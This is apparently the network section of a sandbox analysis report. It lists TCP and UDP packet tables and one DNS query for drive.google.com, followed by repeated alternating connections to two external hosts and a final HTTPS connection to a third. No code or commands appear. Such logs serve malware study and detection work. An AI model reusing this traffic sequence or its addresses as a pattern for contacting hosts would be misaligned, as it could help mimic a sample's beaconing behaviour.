Jan 10, 2025 23:11:24.823740959 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.825889111 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.826088905 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.826147079 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.826155901 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.826195955 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.827400923 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.827451944 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.830028057 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.830200911 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.830250978 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.830261946 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.830300093 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.830956936 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.831011057 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.833626986 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.833765030 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.833765030 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.833790064 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.833807945 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.833827019 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.834461927 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.834502935 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.837165117 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.837219000 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.837265015 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.837307930 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.837357998 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.841773033 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.841794014 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.841836929 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.841926098 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.841975927 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.842046976 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.842088938 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.842134953 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.842184067 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.844146967 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.844211102 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.856471062 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.856551886 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.856587887 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.856622934 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.856622934 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.856647015 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.856659889 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.856668949 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.856690884 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.856714010 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.856905937 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.856956005 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.856962919 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.857004881 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.857028008 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.857073069 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.857078075 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.857122898 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.857708931 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.857795954 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.857847929 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.857853889 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.857896090 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.858372927 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.858423948 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.858428001 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.858470917 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.858495951 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.858542919 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.858547926 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.858593941 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.859153032 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.859195948 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.859200001 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.859240055 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.859250069 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.859294891 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.859299898 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.859345913 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.859353065 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.859397888 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.860014915 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.860058069 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.860068083 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.860109091 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.860162973 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.860208988 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.860213995 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.860256910 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.860873938 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.860922098 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.865103960 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.865322113 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.865355015 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.865374088 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.865381956 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.865392923 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.865427971 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.865807056 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.869503975 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.869508982 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.869590044 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.869595051 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.869642019 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.869657040 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.869702101 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.869708061 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.869746923 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.869752884 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.869793892 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.869822979 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.869868040 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.870075941 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.870129108 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.870146990 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:25.499340057 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:25.504128933 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:25.504261017 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:25.504414082 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:25.509160042 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:26.210196972 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:26.217849016 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:26.222668886 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:26.433708906 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:26.480659962 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:26.772057056 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:26.772110939 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:26.772175074 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:26.773886919 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:26.773904085 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.243431091 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.243556976 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.247263908 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.247282982 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.247597933 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.253962994 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.295348883 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.382534027 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.382607937 CET	443	50005	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.382750034 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.390755892 CET	50005	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.399666071 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:27.404464960 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:27.613913059 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:27.618544102 CET	50006	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.618582964 CET	443	50006	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.618669033 CET	50006	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.619146109 CET	50006	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:27.619167089 CET	443	50006	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:27.668005943 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:28.074094057 CET	443	50006	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:28.076236963 CET	50006	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:28.076267004 CET	443	50006	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:28.215833902 CET	443	50006	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:28.215907097 CET	443	50006	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:28.215950966 CET	50006	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:28.216603041 CET	50006	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:28.222153902 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:28.223913908 CET	50007	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:28.227181911 CET	80	50004	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:28.227231026 CET	50004	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:28.228718996 CET	80	50007	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:28.228775978 CET	50007	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:28.228861094 CET	50007	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:28.233639002 CET	80	50007	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:28.905448914 CET	80	50007	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:28.907440901 CET	50008	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:28.907469034 CET	443	50008	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:28.907557964 CET	50008	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:28.907856941 CET	50008	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:28.907871008 CET	443	50008	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:28.949280024 CET	50007	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:29.381422997 CET	443	50008	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:29.383037090 CET	50008	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:29.383059025 CET	443	50008	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:29.554585934 CET	443	50008	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:29.554651976 CET	443	50008	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:29.554702044 CET	50008	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:29.555171967 CET	50008	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:29.561619997 CET	50009	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:29.566468000 CET	80	50009	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:29.566579103 CET	50009	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:29.566684961 CET	50009	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:29.571474075 CET	80	50009	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:30.284703016 CET	80	50009	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:30.286119938 CET	50010	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:30.286164999 CET	443	50010	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:30.286273956 CET	50010	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:30.286565065 CET	50010	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:30.286577940 CET	443	50010	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:30.339874983 CET	50009	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:30.766469002 CET	443	50010	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:30.773406029 CET	50010	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:30.773427010 CET	443	50010	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:30.901062012 CET	443	50010	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:30.901156902 CET	443	50010	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:30.901226044 CET	50010	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:30.901787043 CET	50010	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:30.905563116 CET	50009	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:30.906691074 CET	50011	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:30.910629034 CET	80	50009	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:30.910708904 CET	50009	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:30.911490917 CET	80	50011	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:30.911562920 CET	50011	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:30.911643028 CET	50011	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:30.916476011 CET	80	50011	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:31.671853065 CET	80	50011	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:31.673903942 CET	50012	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:31.673942089 CET	443	50012	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:31.674124956 CET	50012	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:31.674416065 CET	50012	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:31.674427986 CET	443	50012	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:31.714864016 CET	50011	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:32.132751942 CET	443	50012	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:32.136567116 CET	50012	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:32.136596918 CET	443	50012	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:32.275496006 CET	443	50012	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:32.275588989 CET	443	50012	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:32.275706053 CET	50012	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:32.276226044 CET	50012	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:32.281414032 CET	50011	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:32.282628059 CET	50013	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:32.286525011 CET	80	50011	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:32.286592960 CET	50011	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:32.287422895 CET	80	50013	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:32.287509918 CET	50013	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:32.287682056 CET	50013	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:32.292610884 CET	80	50013	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:32.972223997 CET	80	50013	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:32.973689079 CET	50014	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:32.973735094 CET	443	50014	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:32.973809004 CET	50014	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:32.974097013 CET	50014	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:32.974108934 CET	443	50014	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:33.011756897 CET	50013	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:33.427570105 CET	443	50014	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:33.429339886 CET	50014	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:33.429363966 CET	443	50014	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:33.582782984 CET	443	50014	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:33.582875013 CET	443	50014	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:33.582923889 CET	50014	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:33.583348036 CET	50014	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:33.588479042 CET	50013	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:33.589061975 CET	50015	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:33.593485117 CET	80	50013	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:33.593539000 CET	50013	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:33.593899012 CET	80	50015	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:33.593961000 CET	50015	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:33.594038010 CET	50015	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:33.598822117 CET	80	50015	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:34.325052023 CET	80	50015	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:34.326406956 CET	50016	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:34.326453924 CET	443	50016	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:34.326839924 CET	50016	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:34.326839924 CET	50016	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:34.326875925 CET	443	50016	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:34.371117115 CET	50015	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:34.778981924 CET	443	50016	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:34.780896902 CET	50016	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:34.780919075 CET	443	50016	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:34.912080050 CET	443	50016	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:34.912137032 CET	443	50016	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:34.912353039 CET	50016	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:34.912776947 CET	50016	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:34.921787977 CET	50015	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:34.922790051 CET	50017	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:34.926866055 CET	80	50015	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:34.926934004 CET	50015	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:34.927582979 CET	80	50017	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:34.927659035 CET	50017	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:34.927735090 CET	50017	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:34.932512999 CET	80	50017	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:35.599380970 CET	80	50017	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:35.600720882 CET	50018	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:35.600785017 CET	443	50018	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:35.600874901 CET	50018	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:35.601141930 CET	50018	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:35.601155996 CET	443	50018	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:35.652362108 CET	50017	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:36.055147886 CET	443	50018	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:36.056875944 CET	50018	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:36.056895971 CET	443	50018	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:36.178507090 CET	443	50018	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:36.178606033 CET	443	50018	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:36.178685904 CET	50018	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:36.179258108 CET	50018	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:36.182298899 CET	50017	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:36.183227062 CET	50019	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:36.187269926 CET	80	50017	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:36.187321901 CET	50017	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:36.188064098 CET	80	50019	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:36.188124895 CET	50019	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:36.188204050 CET	50019	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:36.192944050 CET	80	50019	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:36.888720036 CET	80	50019	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:36.890197039 CET	50020	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:36.890254974 CET	443	50020	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:36.890345097 CET	50020	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:36.890611887 CET	50020	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:36.890624046 CET	443	50020	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:36.933659077 CET	50019	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:37.365066051 CET	443	50020	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:37.367352962 CET	50020	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:37.367384911 CET	443	50020	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:37.493031025 CET	443	50020	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:37.493109941 CET	443	50020	104.21.112.1	192.168.2.4
Jan 10, 2025 23:11:37.493335009 CET	50020	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:37.494044065 CET	50020	443	192.168.2.4	104.21.112.1
Jan 10, 2025 23:11:37.536777973 CET	50019	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:37.542714119 CET	80	50019	132.226.247.73	192.168.2.4
Jan 10, 2025 23:11:37.542895079 CET	50019	80	192.168.2.4	132.226.247.73
Jan 10, 2025 23:11:37.546525002 CET	50021	443	192.168.2.4	149.154.167.220
Jan 10, 2025 23:11:37.546571970 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:37.546629906 CET	50021	443	192.168.2.4	149.154.167.220
Jan 10, 2025 23:11:37.547364950 CET	50021	443	192.168.2.4	149.154.167.220
Jan 10, 2025 23:11:37.547375917 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:38.179574966 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:38.181405067 CET	50021	443	192.168.2.4	149.154.167.220
Jan 10, 2025 23:11:38.183329105 CET	50021	443	192.168.2.4	149.154.167.220
Jan 10, 2025 23:11:38.183339119 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:38.183590889 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:38.185342073 CET	50021	443	192.168.2.4	149.154.167.220
Jan 10, 2025 23:11:38.227333069 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:38.423115969 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:38.423211098 CET	443	50021	149.154.167.220	192.168.2.4
Jan 10, 2025 23:11:38.423326015 CET	50021	443	192.168.2.4	149.154.167.220
Jan 10, 2025 23:11:38.426109076 CET	50021	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:11:19.592860937 CET	50022	53	192.168.2.4	1.1.1.1
Jan 10, 2025 23:11:19.599718094 CET	53	50022	1.1.1.1	192.168.2.4
Jan 10, 2025 23:11:20.986162901 CET	55094	53	192.168.2.4	1.1.1.1
Jan 10, 2025 23:11:20.993937016 CET	53	55094	1.1.1.1	192.168.2.4
Jan 10, 2025 23:11:25.489065886 CET	50428	53	192.168.2.4	1.1.1.1
Jan 10, 2025 23:11:25.495690107 CET	53	50428	1.1.1.1	192.168.2.4
Jan 10, 2025 23:11:26.764102936 CET	55302	53	192.168.2.4	1.1.1.1
Jan 10, 2025 23:11:26.771214008 CET	53	55302	1.1.1.1	192.168.2.4
Jan 10, 2025 23:11:37.536683083 CET	56963	53	192.168.2.4	1.1.1.1
Jan 10, 2025 23:11:37.544399977 CET	53	56963	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 23:11:19.592860937 CET	192.168.2.4	1.1.1.1	0x52bb	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
